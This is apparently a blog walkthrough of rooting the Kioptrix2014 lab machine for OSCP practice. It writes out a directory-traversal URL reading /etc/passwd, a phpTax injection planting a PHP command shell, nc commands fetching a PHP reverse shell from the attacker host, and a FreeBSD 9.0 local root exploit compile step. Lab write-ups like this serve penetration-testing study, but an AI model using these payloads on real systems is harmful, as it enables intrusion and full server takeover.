OSCP

Kioptrix2014 – Finally

Kioptrix2014 is one of the most recommended machines to play around prior to  OSCP preparation. Therefore, I am very much eager to shell the box 🙂

Setup:

mountroot> ufs:/dev/ada0p2

*****

Kali Machine IP: 192.168.56.102

Step 0:

ifconfig

Kioptrix Machine IP: 192.168.56.101   (how? )

Step 1:

nmap -sn 192.168.56.102/24

-sn  SYN pack

Step 2:

nmap -sC -sV -p- -A -T4 192.168.56.101 -oN nmap.log

Ouput:

PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden

Step 3:

As always, let’s check whether we can find anything with robots.txt and source code.

No luck with robots.txt

Source code meta tag reveals something interesting!

Let’s visit the link:  http://192.168.56.101/pChart2.1.3/examples/index.php

Step 4:

I went through the folders and was looking for some upload function (I was expecting to upload some shell through which I could do a reverse connection but no luck lol)

Therefore, I had to do some shopping from exploit-db

searchsploit pChart

 cat /usr/share/exploitdb/exploits/php/webapps/31173.txt | less

We received ample of information but I am interested more with this highlighted one 🙂

Step 05:

you have to paste this line after the index.php

?Action=View&Script=%2f..%2f..%2fetc/passwd

By the way, %2f means /     you can learn more about it here.

Therefore, the complete link is

http://192.168.56.101/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd

Step 06:

Lot of things going in my mind regarding what to do next, I realized the importance of having a steady methodology or approach.

Anyway, at this point I really can’t think of a way to proceed further, so let us check the nmap result again and we see that there is a port 8080 is open. Let’s check what resources is loaded there.

It appears that server is hiding something from us. We can check the Apache Configuration. We can do that.

Visit this link:   Additional Resource: To know the location of apache conf file; here.

http://192.168.56.101/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

You can see that it is restricted based on user-agent. let’s configure our browser.

Step 07:

User-Agent ^Mozilla/4.0 Mozilla4_browser

Usually, I use burpsuite for the purpose but this time, let’s use an add-on to suffice the need. I am using Firefox and we will use this user-agent switcher.

  • Click on your add-on
  • Then click on firefox icon
  • click on Pen(or edit icon)
  • Paste the string Mozilla/4.0 Mozilla4_browser

Then I visit the URL again and I got an interesting application running on it.

This application has no upload burden as well. So, we are left with no option other than shopping in exploit-db

searchsploit phptax

Copy the exploit

If you read the exploit you have downloaded carefully, you will come to understand how to use it. So I will not write here. (This will be your assignment, however let me know if you can’t find it).

Nevertheless, I must emphasize here that, in order to perform LFI (Local File Inclusion), as the exploit developer mentioned, it didn’t work for me. Therefore, I googled couple of times(literally copy the steps from other blogger), and had to manually copy the link and paste it in the browser (to upload the rce.php – this is nothing other than the exploit which we download in the above step, I just rename it to rce.php).

If you read the exploit, you will get to know that rce.php provide is command execution feature.

http://192.168.56.8:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET[cmd])%3B%3F%3E%22;

You can check whether you have successfully uploaded your rce.php file by visiting this link

http://192.168.56.8:8080/phptax/data

If you can, then you can execute the command of your interest.. I thought to check suid binaries

http://192.168.56.8:8080/phptax/data/rce.php?cmd=find / -perm -u=s -type f 2>/dev/null

I was not able to find anything useful. I googled all the binaries and I felt like I am trapped in the rabbit hole. So, I thought why not check the kernel by

uname -rms

Guess what I got?!

 

searchsploit freebsd 9.0

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c . 

I copied the exploit code to my current directory (which represents by . )

At this moment, it is very important to know whether we can transfer our exploit and availability of compiler on the victim machine. For this, I am sure you know what to do now?

Yes, execute command in the browser

whereis nc 
whereis gcc

Indeed, these two tools are there. That means, our job become lot easier now. how about we try to get a reverse shell and if we get a reverse connection and can do the privilege escalation then, most of the aforementioned steps are not necessary.  Let us shop a PHP reverse shell from Pentest Monkey

Look in to the exploit of the reverse-shell and modify the IP address to your kali machine: 192.168.56.11  and port number to something you can remember. eg 9000

On your kali machine (attacker machine)

nc -lvp 5000 < php-reverse-shell.php

on browser

cmd=nc 192.168.56.11:5000 > php-reverse-shell.php

At this moment I hope you know how to check whether your shell got successfully uploaded or not.

Now interesting part is left, i.e.,  on your Kali terminal, wait and listen to port 9000

nc -lvp 9000

Visit to your php-reverse-shell.php in the browser, you will get this limited shell with id www

Then I did this

I hope you didn’t forget that we have downloaded an exploit previously for FreeBSD 9.0. Now it’s the time to transfer it. Let’s transfer it to /tmp folder because you know it very well that it has the maximum privilege.

 

Step 07:

Let me know if you find it difficulties, I cut short many steps because I am afraid you might get bored. (Franking I have tested all the exploits and I think this is how a life of security researcher is, always trying and finding)

To compile the c program:

gcc 28718.c -o exploit

Dishooom!!

./exploit

And the flag is ….

Note:  Kindly bear with me, I tried this box long time back and I stopped for sometime and I resume my writeup yesterday, so there might be difference in the IP (both Kali and Victim machines). Kindly drop a message, if you find any difficulties…

Regards…
Sam.

 

 

 

 

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also
Close
Back to top button